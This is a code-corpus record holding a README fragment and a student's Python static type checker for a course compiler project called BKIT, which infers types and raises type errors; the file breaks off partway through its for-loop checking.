ASTGenSuite\n```\n\n**DISCLAIMER:** I write this tool in only 1 hour so be careful with the error. Please commit you repo before use this tool in order to avoid any problem. If you see some bugs of the gen processs, please fix it yourself or report it to my [facebook](fb.com/sotfdat) for help (I rarely reply the message from stranger)." }, { "alpha_fraction": 0.5327810049057007, "alphanum_fraction": 0.534298837184906, "avg_line_length": 40.977874755859375, "blob_id": "a83cb6ebdc1d967d51f4b34d977c70b90c88f618", "content_id": "8b16de80fab9d6859452d9f1434dd5842b04a83f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 47436, "license_type": "no_license", "max_line_length": 119, "num_lines": 1130, "path": "/Assignments/assignment3/src/main/bkit/checker/StaticCheck.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "\n\"\"\"\n * @author nhphung\n\"\"\"\nfrom abc import ABC, abstractmethod, ABCMeta\nfrom dataclasses import dataclass\nfrom typing import List, Tuple\n# from AST import *\nfrom AST_GEN_TEST import *\nfrom Visitor import *\nfrom StaticError import *\nfrom functools import *\n\nclass Type(ABC):\n __metaclass__ = ABCMeta\n pass\nclass Prim(Type):\n __metaclass__ = ABCMeta\n pass\nclass IntType(Prim):\n pass\nclass FloatType(Prim):\n pass\nclass StringType(Prim):\n pass\nclass BoolType(Prim):\n pass\nclass VoidType(Type):\n pass\nclass Unknown(Type):\n pass\n\n@dataclass\nclass ArrayType(Type):\n dimen:List[int]\n eletype: Type\n\n@dataclass\nclass MType:\n intype:List[Type]\n restype:Type\n\n@dataclass\nclass Symbol:\n name: str\n mtype:Type\n\n\nclass StaticChecker(BaseVisitor):\n def __init__(self,ast):\n self.ast = ast\n self.global_envi = [\nSymbol(\"int_of_float\",MType([FloatType()],IntType())),\nSymbol(\"float_of_int\",MType([IntType()],FloatType())),\nSymbol(\"int_of_string\",MType([StringType()],IntType())),\nSymbol(\"string_of_int\",MType([IntType()],StringType())),\nSymbol(\"float_of_string\",MType([StringType()],FloatType())),\nSymbol(\"string_of_float\",MType([FloatType()],StringType())),\nSymbol(\"bool_of_string\",MType([StringType()],BoolType())),\nSymbol(\"string_of_bool\",MType([BoolType()],StringType())),\nSymbol(\"read\",MType([],StringType())),\nSymbol(\"printLn\",MType([],VoidType())),\nSymbol(\"printStr\",MType([StringType()],VoidType())),\nSymbol(\"printStrLn\",MType([StringType()],VoidType()))]\n\n \n def check(self):\n normalize_global = []\n for symbol in self.global_envi:\n intype = []\n if len(symbol.mtype.intype):\n for idx in range(len(symbol.mtype.intype)):\n intype.append(Symbol('', symbol.mtype.intype[idx]))\n symbol.mtype.intype = intype\n return self.visit(self.ast,self.global_envi)\n \n\n def visitProgram(self,ast,c):\n \"\"\"\n Phase 1:\n -> visit all declaration -> create a stack base frame\n ERROR: Redeclared, NoEntryPoint\n Phase 2:\n -> inference the type by visit function.scope\n ERROR: Undeclare, TypeMismatchInExpression, TypeMismatchInStatement\n TypeCannotBeInferred\n \"\"\"\n global_scope = reduce(lambda env, x: [self.visitGlobal(x, env)] + env, ast.decl, c)\n self.env = global_scope\n self.hasEntryPoint = False\n [self.visit(x,self.env) for x in ast.decl]\n if self.hasEntryPoint == False:\n raise NoEntryPoint()\n\n def visitVarDecl(self, ast, c):\n \"\"\"\n Visit each global var top-down\n \"\"\"\n symbol = self.visit(ast.variable, c)\n if symbol is None:\n symbol = Symbol(ast.variable.name, None)\n if symbol.mtype is not None:\n raise Redeclared(Variable(), symbol.name)\n symbol.mtype = Unknown()\n dimen = list(ast.varDimen)\n init_type = self.visit(ast.varInit, []) if ast.varInit else Symbol('', Unknown())\n if len(dimen):\n if not isinstance(init_type.mtype, (ArrayType, Unknown)):\n \"\"\"\n Declaration of array with mismatch type is TypeMismatch\n or Type can not be infered\n \"\"\"\n raise TypeMismatchInStatement(ast)\n \n if isinstance(init_type.mtype, ArrayType):\n if dimen != init_type.mtype.dimen:\n raise TypeMismatchInStatement(ast)\n symbol.mtype = init_type.mtype\n return symbol\n else:\n symbol.mtype = ArrayType(dimen, Unknown())\n return symbol\n else:\n if isinstance(init_type.mtype, ArrayType):\n raise TypeMismatchInStatement(ast)\n symbol.mtype = init_type.mtype\n \n return symbol\n\n def visitFuncDecl(self, ast, env):\n \"\"\"\n docstring\n \"\"\"\n symbol = self.visit(ast.name, env)\n if symbol.name == 'main':\n self.hasEntryPoint = True\n param = []\n try:\n param = reduce(lambda env, x: env + [self.visit(x, env)], ast.param, [])\n except Redeclared as e:\n raise Redeclared(Parameter(), e.n)\n if len(symbol.mtype.intype) != len(param):\n raise TypeMismatchInExpression(ast)\n if len(symbol.mtype.intype):\n if symbol.mtype.intype[0]:\n # Was inferred (was inferred in somewhere before visit)\n for idx in range(len(param)):\n if isinstance(symbol.mtype.intype[idx].mtype, MType):\n param[idx].mtype = symbol.mtype.intype[idx].mtype.restype \n else:\n param[idx].mtype = symbol.mtype.intype[idx].mtype\n else:\n symbol.mtype.intype = param\n\n scope_env = reduce(lambda env, x: [self.visit(x, env)] + env, ast.body[0], param)\n cur_env = scope_env + env\n\n res_type_list = []\n for stmt in ast.body[1]:\n try:\n typ = self.visit(stmt, cur_env)\n if typ is not None:\n if not symbol.mtype.restype:\n symbol.mtype.restype = typ.mtype\n if type(symbol.mtype.restype) != type(typ.mtype):\n raise TypeMismatchInStatement(stmt)\n res_type_list += [typ]\n except TypeCannotBeInferred:\n raise TypeCannotBeInferred(stmt)\n if not symbol.mtype.restype:\n raise FunctionNotReturn(symbol.name)\n \n param_list = cur_env[len(scope_env) - len(param): len(scope_env)]\n \n symbol.mtype.intype = param_list\n # print('sym_name: {}, sym_type: {}'.format(symbol.name, symbol.mtype))\n\n def visitArrayCell(self, ast, env):\n \"\"\"\n For an array indexing E[E1]...[En], -\n E must be in array type with n dimensions and E1...En must be integer.\n Input: All arraycell must be declared in vardecl, so there no redeclared\n \"\"\"\n e = self.visit(ast.arr, env)\n if e is None:\n raise Undeclared(Identifier(), ast.arr)\n if not isinstance(e.mtype, (ArrayType,MType)):\n raise TypeMismatchInExpression(ast)\n if isinstance(e.mtype, ArrayType):\n if len(e.mtype.dimen) != len(ast.idx):\n raise TypeMismatchInExpression(ast)\n if isinstance(e.mtype, MType):\n if isinstance(e.mtype.restype, (Unknown)):\n e.mtype.restype = ArrayType([0]*len(ast.idx), Unknown())\n if isinstance(e.mtype.restype, ArrayType):\n if len(e.mtype.restype.dimen) != len(ast.idx):\n raise TypeMismatchInExpression(ast)\n e.mtype.restype = e.mtype.restype.eletype\n else:\n raise TypeMismatchInExpression(ast)\n e_i = [self.visit(x, env) for x in ast.idx]\n for e_k in e_i:\n if isinstance(e_k.mtype, (Prim, Unknown)):\n if isinstance(e_k.mtype, Unknown):\n e_k.mtype = IntType()\n if not isinstance(e_k.mtype, IntType):\n raise TypeMismatchInExpression(ast)\n if isinstance(e_k.mtype, ArrayType):\n if isinstance(e_k.mtype.eletype, Unknown):\n e_k.mtype.eletype = IntType()\n if not isinstance(e_k.mtype.eletype, IntType):\n raise TypeMismatchInExpression(ast)\n if isinstance(e_k.mtype, MType):\n if isinstance(e_k.mtype.restype, Unknown):\n e_k.mtype.restype = IntType()\n if not isinstance(e_k.mtype.restype, IntType):\n raise TypeMismatchInExpression(ast)\n \n return e\n \n\n def visitBinaryOp(self, ast, env):\n \"\"\"\n ==, ! =, <, >, <=, >=, = / =, < ., > ., <= ., >= .\n \"\"\"\n # RELATIONAL\n ## Int\n ltype = rtype = None\n if ast.op in ['==', '!=', '<', '>', '>=', '<=']:\n l = self.visit(ast.left, env)\n if l is None:\n raise Undeclared(Identifier(), ast.left.name)\n if isinstance(l.mtype, Unknown):\n l.mtype = IntType()\n ltype = l.mtype\n if isinstance(l.mtype, ArrayType):\n if isinstance(l.mtype.eletype, Unknown):\n l.mtype.eletype = IntType()\n ltype = l.mtype.eletype\n if isinstance(l.mtype, MType):\n if isinstance(l.mtype.restype, Unknown):\n l.mtype.restype = IntType()\n ltype = l.mtype.restype\n r = self.visit(ast.right, env)\n if r is None:\n raise Undeclared(Identifier(), ast.right.name)\n if isinstance(r.mtype, Unknown):\n r.mtype = IntType()\n rtype = r.mtype\n if isinstance(r.mtype, ArrayType):\n if isinstance(r.mtype.eletype, Unknown):\n r.mtype.eletype = IntType()\n rtype = r.mtype.eletype\n if isinstance(r.mtype, MType):\n if isinstance(r.mtype.restype, Unknown):\n r.mtype.restype = IntType()\n rtype = r.mtype.restype\n if not isinstance(ltype, IntType) or not isinstance(rtype, IntType):\n raise TypeMismatchInExpression(ast)\n return Symbol('', BoolType())\n ## Float\n if ast.op in ['=/=', '<.', '>.', '>=.', '<=.']: \n l = self.visit(ast.left, env)\n if l is None:\n raise Undeclared(Identifier(), ast.left.name)\n if isinstance(l.mtype, Unknown):\n l.mtype = FloatType()\n ltype = l.mtype\n if isinstance(l.mtype, ArrayType):\n if isinstance(l.mtype.eletype, Unknown):\n l.mtype.eletype = FloatType()\n ltype = l.mtype.eletype\n if isinstance(l.mtype, MType):\n if isinstance(l.mtype.restype, Unknown):\n l.mtype.restype = FloatType()\n ltype = l.mtype.restype\n\n r = self.visit(ast.right, env)\n if r is None:\n raise Undeclared(Identifier(), ast.right.name)\n if isinstance(r.mtype, Unknown):\n r.mtype = FloatType()\n rtype = r.mtype\n if isinstance(r.mtype, ArrayType):\n if isinstance(r.mtype.eletype, Unknown):\n r.mtype.eletype = FloatType()\n rtype = r.mtype.eletype\n if isinstance(r.mtype, MType):\n if isinstance(r.mtype.restype, Unknown):\n r.mtype.restype = FloatType()\n rtype = r.mtype.restype\n if not isinstance(ltype, FloatType) or not isinstance(rtype, FloatType):\n raise TypeMismatchInExpression(ast)\n \n return Symbol('', BoolType())\n \n # BOOLEAN\n if ast.op in ['&&' , '||']:\n l = self.visit(ast.left, env)\n if l is None:\n raise Undeclared(Identifier(), ast.left.name)\n if isinstance(l.mtype, Unknown):\n l.mtype = BoolType()\n ltype = l.mtype\n if isinstance(l.mtype, ArrayType):\n if isinstance(l.mtype.eletype, Unknown):\n l.mtype.eletype = BoolType()\n ltype = l.mtype.eletype\n if isinstance(l.mtype, MType):\n if isinstance(l.mtype.restype, Unknown):\n l.mtype.restype = BoolType()\n ltype = l.mtype.restype\n r = self.visit(ast.right, env)\n if r is None:\n raise Undeclared(Identifier(), ast.right.name)\n if isinstance(r.mtype, Unknown):\n r.mtype = BoolType()\n rtype = r.mtype\n if isinstance(r.mtype, ArrayType):\n if isinstance(r.mtype.eletype, Unknown):\n r.mtype.eletype = BoolType()\n rtype = r.mtype.eletype\n if isinstance(r.mtype, MType):\n if isinstance(r.mtype.restype, Unknown):\n r.mtype.restype = BoolType()\n rtype = r.mtype.restype\n if not isinstance(ltype, BoolType) or not isinstance(rtype, BoolType):\n raise TypeMismatchInExpression(ast)\n \n return Symbol('', BoolType())\n \n # ARITHMETIC\n ## Int\n if ast.op in ['-' , '+', '*', '\\\\', '%']:\n l = self.visit(ast.left, env)\n if l is None:\n raise Undeclared(Identifier(), ast.left.name)\n if isinstance(l.mtype, Unknown):\n l.mtype = IntType()\n ltype = l.mtype\n if isinstance(l.mtype, ArrayType):\n if isinstance(l.mtype.eletype, Unknown):\n l.mtype.eletype = IntType()\n ltype = l.mtype.eletype\n if isinstance(l.mtype, MType):\n if isinstance(l.mtype.restype, Unknown):\n l.mtype.restype = IntType()\n ltype = l.mtype.restype\n r = self.visit(ast.right, env)\n if r is None:\n raise Undeclared(Identifier(), ast.right.name)\n if isinstance(r.mtype, Unknown):\n r.mtype = IntType()\n rtype = r.mtype\n if isinstance(r.mtype, ArrayType):\n if isinstance(r.mtype.eletype, Unknown):\n r.mtype.eletype = IntType()\n rtype = r.mtype.eletype\n if isinstance(r.mtype, MType):\n if isinstance(r.mtype.restype, Unknown):\n r.mtype.restype = IntType()\n rtype = r.mtype.restype\n if not isinstance(ltype, IntType) or not isinstance(rtype, IntType):\n raise TypeMismatchInExpression(ast)\n return Symbol('', IntType())\n \n ## Float\n if ast.op in ['-.' , '+.', '*.', '\\\\.']:\n l = self.visit(ast.left, env)\n if l is None:\n raise Undeclared(Identifier(), ast.left.name)\n if isinstance(l.mtype, Unknown):\n l.mtype = FloatType()\n ltype = l.mtype\n if isinstance(l.mtype, ArrayType):\n if isinstance(l.mtype.eletype, Unknown):\n l.mtype.eletype = FloatType()\n ltype = l.mtype.eletype\n if isinstance(l.mtype, MType):\n if isinstance(l.mtype.restype, Unknown):\n l.mtype.restype = FloatType()\n ltype = l.mtype.restype\n \n r = self.visit(ast.right, env)\n if r is None:\n raise Undeclared(Identifier(), ast.right.name)\n if isinstance(r.mtype, Unknown):\n r.mtype = FloatType()\n rtype = r.mtype\n if isinstance(r.mtype, ArrayType):\n if isinstance(r.mtype.eletype, Unknown):\n r.mtype.eletype = FloatType()\n rtype = r.mtype.eletype\n if isinstance(r.mtype, MType):\n if isinstance(r.mtype.restype, Unknown):\n r.mtype.restype = FloatType()\n rtype = r.mtype.restype\n\n if not isinstance(ltype, FloatType) or not isinstance(rtype, FloatType):\n raise TypeMismatchInExpression(ast)\n \n return Symbol('', FloatType())\n\n def visitUnaryOp(self, ast, env):\n \"\"\"\n docstring\n \"\"\"\n # ARITHMETIC\n ## Int\n otype = None\n if ast.op in ['-']:\n operand = self.visit(ast.body, env)\n if operand is None:\n raise Undeclared(Identifier(), ast.body.name)\n if isinstance(operand.mtype, Unknown):\n operand.mtype = IntType()\n otype = operand.mtype\n if isinstance(operand.mtype, ArrayType):\n if isinstance(operand.mtype.eletype, Unknown):\n operand.mtype.eletype = IntType()\n otype = operand.mtype.eletype\n if isinstance(operand.mtype, MType):\n if isinstance(operand.mtype.restype, Unknown):\n operand.mtype.restype = IntType()\n otype = operand.mtype.restype\n if not isinstance(otype, IntType):\n raise TypeMismatchInExpression(ast)\n return Symbol('', IntType())\n ## Float\n if ast.op in ['-.']:\n operand = self.visit(ast.body, env)\n if operand is None:\n raise Undeclared(Identifier, ast.body.name)\n if isinstance(operand.mtype, Unknown):\n operand.mtype = FloatType()\n otype = operand.mtype\n if isinstance(operand.mtype, ArrayType):\n if isinstance(operand.mtype.eletype, Unknown):\n operand.mtype.eletype = FloatType()\n otype = operand.mtype.eletype\n if isinstance(operand.mtype, MType):\n if isinstance(operand.mtype.restype, Unknown):\n operand.mtype.restype = FloatType()\n otype = operand.mtype.restype\n if not isinstance(otype, FloatType):\n raise TypeMismatchInExpression(ast)\n\n return Symbol('', FloatType())\n\n # BOOLEAN\n if ast.op in ['!']:\n operand = self.visit(ast.body, env)\n if operand is None:\n raise Undeclared(Identifier(), ast.body.name)\n if isinstance(operand.mtype, Unknown):\n operand.mtype = BoolType()\n otype = operand.mtype\n if isinstance(operand.mtype, ArrayType):\n if isinstance(operand.mtype.eletype, Unknown):\n operand.mtype.eletype = BoolType()\n otype = operand.mtype.eletype\n if isinstance(operand.mtype, MType):\n if isinstance(operand.mtype.restype, Unknown):\n operand.mtype.restype = BoolType()\n otype = operand.mtype.restype\n\n if not isinstance(otype, BoolType):\n raise TypeMismatchInExpression(ast)\n return Symbol('', BoolType())\n\n def visitCallExpr(self, ast, env):\n \"\"\"\n Return type of call expr is inferred when it call by the \n parent operand (can be infer from op)\n assignment (can be infer from assign statement)\n \"\"\"\n func = self.visit(ast.method, env)\n if func is None or not isinstance(func.mtype, MType):\n raise Undeclared(Function(), ast.method.name)\n if len(func.mtype.intype) != len(ast.param):\n raise TypeMismatchInExpression(ast)\n args = [self.visit(arg, env) for arg in ast.param]\n for (idx, arg) in enumerate(ast.param):\n arg_sym = self.visit(arg, env) # arg_type: Symbol\n arg_type = Unknown()\n is_arr = False\n if isinstance(arg_sym.mtype, (Prim, Unknown)):\n arg_type = arg_sym.mtype\n if isinstance(arg_sym.mtype, MType):\n arg_type = arg_sym.mtype.restype\n if isinstance(arg_sym.mtype, ArrayType):\n arg_type = arg_sym.mtype.eletype\n is_arr = True\n if isinstance(arg_type, Unknown):\n if func.mtype.intype[idx] == None:\n raise TypeCannotBeInferred(ast)\n if isinstance(func.mtype.intype[idx].mtype, Prim):\n if isinstance(func.mtype.intype[idx].mtype, Unknown):\n raise TypeCannotBeInferred(ast)\n arg_type = func.mtype.intype[idx].mtype\n if isinstance(func.mtype.intype[idx].mtype, MType):\n if isinstance(func.mtype.intype[idx].mtype.restype, Unknown):\n raise TypeCannotBeInferred(ast)\n arg_type = func.mtype.intype[idx].mtype.restype\n if isinstance(func.mtype.intype[idx].mtype, ArrayType):\n if not is_arr:\n raise TypeMismatchInExpression(ast)\n if isinstance(func.mtype.intype[idx].mtype.eletype, Unknown):\n raise TypeCannotBeInferred(ast)\n arg_type = func.mtype.intype[idx].mtype.eletype\n \n else: # arg_type is known\n # print(func.mtype.intype[idx])\n # print(arg_sym)\n if func.mtype.intype[idx] == None:\n func.mtype.intype[idx] = arg_sym\n if isinstance(func.mtype.intype[idx].mtype, (Unknown,Prim)):\n if isinstance(func.mtype.intype[idx].mtype, Unknown):\n func.mtype.intype[idx].mtype = arg_type\n if type(func.mtype.intype[idx].mtype) != type(arg_type):\n raise TypeMismatchInExpression(ast)\n if isinstance(func.mtype.intype[idx].mtype, MType):\n if isinstance(func.mtype.intype[idx].mtype.restype, Unknown):\n func.mtype.intype[idx].mtype.restype = arg_type\n if type(func.mtype.intype[idx].mtype.restype) != type(arg_type):\n raise TypeMismatchInExpression(ast)\n if isinstance(func.mtype.intype[idx].mtype, ArrayType):\n if not is_arr:\n raise TypeMismatchInExpression(ast)\n if isinstance(func.mtype.intype[idx].mtype.eletype, Unknown):\n func.mtype.intype[idx].mtype.eletype = arg_type\n if type(func.mtype.intype[idx].mtype.eletype) != type(arg_type):\n raise TypeMismatchInExpression(ast)\n if type(func.mtype.intype[idx]) != type(arg_sym):\n # array type not match\n raise TypeMismatchInExpression(ast)\n \n if isinstance(arg_sym.mtype, (Prim, Unknown)):\n arg_sym.mtype = arg_type\n if isinstance(arg_sym.mtype, MType):\n arg_sym.mtype.restype = arg_type\n if isinstance(arg_sym.mtype, ArrayType):\n arg_sym.mtype.eletype = arg_type\n if func.mtype.restype == None:\n func.mtype.restype = Unknown()\n return func\n \n def visitIntLiteral(self, ast, env):\n return Symbol('', IntType())\n\n def visitStringLiteral(self, ast, env):\n return Symbol('', StringType())\n\n def visitBooleanLiteral(self, ast, env):\n return Symbol('', BoolType())\n \n def visitFloatLiteral(self, ast, env):\n return Symbol('', FloatType())\n\n def visitArrayLiteral(self, ast, env):\n type_of_arr = [self.visit(x,[]) for x in ast.value]\n if not len(type_of_arr):\n return Symbol('',ArrayType([0], Unknown()))\n num_of_type = reduce(lambda count, x: count if self.is_same_type(x, type_of_arr[0]) else count + 1,\\\n type_of_arr, 1)\n if num_of_type == 1:\n \"\"\"\n Same type for all elements in array\n \"\"\"\n curr_dimen = [len(type_of_arr)]\n last_dimen = type_of_arr[0].mtype.dimen if isinstance(type_of_arr[0].mtype, ArrayType) else []\n dimen = curr_dimen + last_dimen\n typ = type_of_arr[0].mtype.eletype if isinstance(type_of_arr[0].mtype, ArrayType) else type_of_arr[0].mtype\n return Symbol('',ArrayType(dimen, typ))\n else:\n raise InvalidArrayLiteral(ast)\n\n def visitAssign(self, ast, env):\n \"\"\"\n lhs = rhs\n <Symbol> = <Symbol>\n Can we assign VoidType to VoidType\n \"\"\"\n rtype = ltype = None\n rhs = self.visit(ast.rhs, env)\n if rhs is None:\n raise Undeclared(Identifier(), ast.rhs.name)\n\n lhs = self.visit(ast.lhs, env)\n if lhs is None:\n raise Undeclared(Identifier(), ast.lhs.name)\n\n # there will be 9 cases\n # MTYPE = MTYPE\n if isinstance(lhs.mtype, MType) and isinstance(rhs.mtype, MType):\n # if isinstance(rhs.mtype.restype, VoidType) or isinstance(lhs.mtype.restype, VoidType):\n # raise TypeMismatchInExpression(ast)\n if isinstance(rhs.mtype.restype, Unknown):\n rhs.mtype.restype = lhs.mtype\n if isinstance(lhs.mtype.restype, Unknown):\n lhs.mtype.restype = rhs.mtype\n if isinstance(lhs.mtype.restype, Unknown):\n raise TypeCannotBeInferred(ast)\n if type(lhs.mtype.restype) != type(rhs.mtype.restype):\n raise TypeMismatchInStatement(ast)\n \n # ARRAY = MTYPE\n if isinstance(lhs.mtype, ArrayType) and isinstance(rhs.mtype, MType):\n if isinstance(ast.lhs, Id):\n raise TypeMismatchInStatement(ast)\n if isinstance(rhs.mtype.restype, VoidType):\n raise TypeMismatchInExpression(ast)\n if isinstance(rhs.mtype.restype, Unknown):\n rhs.mtype.restype = lhs.mtype.eletype\n if isinstance(lhs.mtype.eletype, Unknown):\n lhs.mtype.eletype = rhs.mtype.restype\n if isinstance(lhs.mtype.eletype, Unknown):\n raise TypeCannotBeInferred(ast)\n if type(lhs.mtype.eletype) != type(rhs.mtype.restype):\n raise TypeMismatchInStatement(ast)\n \n # PRIM = MTYPE\n if isinstance(lhs.mtype, (Prim, Unknown)) and isinstance(rhs.mtype, MType):\n if isinstance(rhs.mtype.restype, VoidType):\n raise TypeMismatchInExpression(ast)\n if isinstance(rhs.mtype.restype, Unknown):\n rhs.mtype.restype = lhs.mtype\n if isinstance(lhs.mtype, Unknown):\n lhs.mtype = rhs.mtype.restype\n if isinstance(lhs.mtype, Unknown):\n raise TypeCannotBeInferred(ast)\n if type(lhs.mtype) != type(rhs.mtype.restype):\n raise TypeMismatchInStatement(ast)\n \n # MTYPE = ARRAY\n if isinstance(lhs.mtype, MType) and isinstance(rhs.mtype, ArrayType):\n if isinstance(ast.rhs, Id):\n raise TypeMismatchInStatement(ast)\n if isinstance(lhs.mtype.restype, VoidType):\n raise TypeMismatchInExpression(ast)\n if isinstance(lhs.mtype.restype, Unknown):\n lhs.mtype.restype = rhs.mtype.eletype\n if isinstance(rhs.mtype.eletype):\n rhs.mtype.eletype = lhs.mtype.restype\n if isinstance(lhs.mtype.restype, Unknown):\n raise TypeCannotBeInferred(ast)\n if type(lhs.mtype.restype) != type(rhs.mtype.eletype):\n raise TypeMismatchInStatement(ast)\n \n # ARRAY = ARRAY\n if isinstance(lhs.mtype, ArrayType) and isinstance(rhs.mtype, ArrayType):\n if isinstance(ast.lhs, Id) and not isinstance(ast.rhs, Id):\n raise TypeMismatchInStatement(ast)\n if not isinstance(ast.lhs, Id) and isinstance(ast.rhs, Id):\n raise TypeMismatchInStatement(ast)\n if isinstance(lhs.mtype.eletype, Unknown):\n lhs.mtype.eletype = rhs.mtype.eletype\n if isinstance(rhs.mtype.eletype, Unknown):\n rhs.mtype.eletype = lhs.mtype.eletype\n if isinstance(rhs.mtype.eletype, Unknown):\n raise TypeCannotBeInferred(ast)\n if type(rhs.mtype.eletype) != type(lhs.mtype.eletype):\n raise TypeMismatchInStatement(ast)\n \n # PRIM = ARRAY\n if isinstance(lhs.mtype, (Prim, Unknown)) and isinstance(rhs.mtype, ArrayType):\n if isinstance(ast.rhs, Id):\n raise TypeMismatchInStatement(ast)\n if isinstance(lhs.mtype, Unknown):\n lhs.mtype = rhs.mtype.eletype\n if isinstance(rhs.mtype.eletype, Unknown):\n rhs.mtype.eletype = lhs.mtype\n if isinstance(lhs.mtype, Unknown):\n raise TypeCannotBeInferred(ast)\n if type(lhs.mtype) != type(rhs.mtype.eletype):\n raise TypeMismatchInStatement(ast)\n \n # MTYPE = PRIM\n if isinstance(lhs.mtype, MType) and isinstance(rhs.mtype, (Prim, Unknown)):\n if isinstance(lhs.mtype.restype, VoidType):\n raise TypeMismatchInExpression(ast)\n if isinstance(lhs.mtype.restype, Unknown):\n lhs.mtype.restype = rhs.mtype\n if isinstance(rhs.mtype, Unknown):\n rhs.mtype = lhs.mtype.restype\n if isinstance(rhs.mtype, Unknown):\n raise TypeCannotBeInferred(ast)\n if type(lhs.mtype.restype) != type(rhs.mtype):\n raise TypeMismatchInStatement(ast)\n \n # ARRAY = PRIM\n if isinstance(lhs.mtype, ArrayType) and isinstance(rhs.mtype, (Prim, Unknown)):\n if isinstance(ast.lhs, Id):\n raise TypeMismatchInStatement(ast)\n if isinstance(lhs.mtype.eletype, Unknown):\n lhs.mtype.eletype = rhs.mtype\n if isinstance(rhs.mtype, Unknown):\n rhs.mtype = lhs.mtype.eletype\n if isinstance(rhs.mtype, Unknown):\n raise TypeCannotBeInferred(ast)\n if type(lhs.mtype.eletype) != type(rhs.mtype):\n raise TypeMismatchInStatement(ast)\n \n # PRIM = PRIM\n if isinstance(lhs.mtype, (Prim, Unknown)) and isinstance(rhs.mtype, (Prim, Unknown)):\n if isinstance(lhs.mtype, Unknown):\n lhs.mtype = rhs.mtype\n if isinstance(rhs.mtype, Unknown):\n rhs.mtype = lhs.mtype\n if isinstance(lhs.mtype, Unknown):\n raise TypeCannotBeInferred(ast)\n if type(rhs.mtype) != type(lhs.mtype):\n raise TypeMismatchInStatement(ast)\n \n return None\n\n def visitIf(self, ast, env):\n \"\"\"\n scope_type statement\n \"\"\"\n return_type = None\n for idx in range(len(ast.ifthenStmt)):\n con_expr = self.visit(ast.ifthenStmt[idx][0], env) # if condition\n con_val = None\n if con_expr is None:\n if isinstance(ast.ifthenStmt[idx][0], Id):\n raise Undeclared(Identifier(), ast.ifthenStmt[idx][0].name)\n # for call_expr and call_stmt: it raise exception when visit call_\n # so we do not need to handle it here\n\n if isinstance(con_expr.mtype, (Prim, Unknown)):\n if isinstance(con_expr.mtype, Unknown):\n con_expr.mtype = BoolType()\n con_val = con_expr.mtype\n\n if isinstance(con_expr.mtype, ArrayType):\n if isinstance(con_expr.mtype.eletype, Unknown):\n con_expr.mtype.eletype = BoolType()\n con_val = con_expr.mtype.eletype\n \n if isinstance(con_expr.mtype, MType):\n if isinstance(con_expr.mtype.restype, Unknown):\n con_expr.mtype.restype = BoolType()\n con_val = con_expr.mtype.restype\n\n if not isinstance(con_val, BoolType):\n raise TypeMismatchInStatement(ast)\n \n scope = reduce(lambda y, x: [self.visit(x, y)] + y, ast.ifthenStmt[idx][1], []) \n if_env = scope + env\n # res_list = [self.visit(stmt, if_env) for stmt in ast.ifthenStmt[0][2]]\n res_type_list = []\n for stmt in ast.ifthenStmt[idx][2]:\n try:\n typ = self.visit(stmt, if_env)\n if typ is not None:\n res_type_list += [typ]\n if type(res_type_list[0].mtype) != type(typ.mtype):\n raise TypeMismatchInStatement(stmt)\n except TypeCannotBeInferred:\n raise TypeCannotBeInferred(stmt)\n env = if_env[len(scope):]\n for res in res_type_list:\n if res:\n return_type = res\n if len(ast.elseStmt):\n print('come here')\n scope = reduce(lambda env, x: env + [self.visit(x, env)], ast.elseStmt[0], [])\n else_env = env + scope\n # res_list = [self.visit(stmt, else_env) for stmt in ast.elseStmt[1]]\n for stmt in ast.elseStmt[1]:\n try:\n typ = self.visit(stmt, else_env)\n if typ is not None:\n res_type_list += [typ]\n if type(res_type_list[0].mtype) != type(typ.mtype):\n raise TypeMismatchInStatement(stmt)\n except TypeCannotBeInferred:\n raise TypeCannotBeInferred(stmt)\n for res in res_type_list:\n if res:\n return_type = res\n env = else_env[len(scope):]\n return return_type\n\n def visitFor(self, ast, env):\n \"\"\"\n Check if all has the same type as spec\n \"\"\"\n idx1 = self.visit(ast.idx1, env)\n idx1_val = None\n if idx1 is None:\n raise Undeclared(Identifier(), ast.idx1.name)\n if isinstance(idx1.mtype, (Prim, Unknown)):\n if isinstance(idx1.mtype, Unknown):\n idx1.mtype = IntType()\n idx1_val = idx1.mtype\n if isinstance(idx1.mtype, ArrayType):\n if isinstance(idx1.mtype.eletype, Unknown):\n idx1.mtype.eletype = IntType()\n idx1_val = idx1.mtype.eletype\n if isinstance(idx1.mtype, MType):\n if isinstance(idx1.mtype.restype, Unknown):\n idx1.mtype.restype = IntType()\n idx1_val = idx1.mtype.restype\n if not isinstance(idx1_val, IntType):\n raise TypeMismatchInStatement(ast)\n\n init_expr = self.visit(ast.expr1, env)\n init_val = None\n if init_expr is None:\n raise Undeclared(Identifier(), ast.expr1.name)\n if isinstance(init_expr.mtype, (Prim, Unknown)):\n if isinstance(init_expr.mtype, Unknown):\n init_expr.mtype = IntType()\n init_val = init_expr.mtype\n if isinstance(init_expr.mtype, ArrayType):\n if isinstance(init_expr.mtype.eletype, Unknown):\n init_expr.mtype.eletype = IntType()\n init_val = init_expr.mtype.eletype\n if isinstance(init_expr.mtype, MType):\n if isinstance(init_expr.mtype.restype, Unknown):\n init_expr.mtype.restype = IntType()\n init_val = init_expr.mtype.restype\n if not isinstance(init_val, IntType):\n raise TypeMismatchInStatement(ast)\n\n con_expr = self.visit(ast.expr2, env)\n con_val = None\n if con_expr is None:\n raise Undeclared(Identifier(), ast.expr2.name)\n if isinstance(con_expr.mtype, (Prim, Unknown)):\n if isinstance(con_expr.mtype, Unknown):\n con_expr.mtype = BoolType()\n con_val = con_expr.mtype\n if isinstance(con_expr.mtype, ArrayType):\n if isinstance(con_expr.mtype.eletype, Unknown):\n con_expr.mtype.eletype = BoolType()\n con_val = con_expr.mtype.eletype\n if isinstance(con_expr.mtype, MType):\n if isinstance(con_expr.mtype.restype, Unknown):\n con_expr.mtype.restype = BoolType()\n con_val = con_expr.mtype.restype\n if not isinstance(con_val, BoolType):\n raise TypeMismatchInStatement(ast)\n \n update_expr = self.visit(ast.expr3, env)\n update_val = None\n if update_expr is None:\n raise Undeclared(Identifier(), ast.expr1.name)\n if isinstance(update_expr.mtype, (Prim, Unknown)):\n if isinstance(update_expr.mtype, Unknown):\n update_expr.mtype = IntType()\n update_val = update_expr.mtype\n if isinstance(update_expr.mtype, ArrayType):\n if isinstance(update_expr.mtype.eletype, Unknown):\n update_expr.mtype.eletype = IntType()\n update_val = update_expr.mtype.eletype\n if isinstance(update_expr.mtype, MType):\n if isinstance(update_expr.mtype.restype, Unknown):\n update_expr.mtype.restype = IntType()\n update_val = 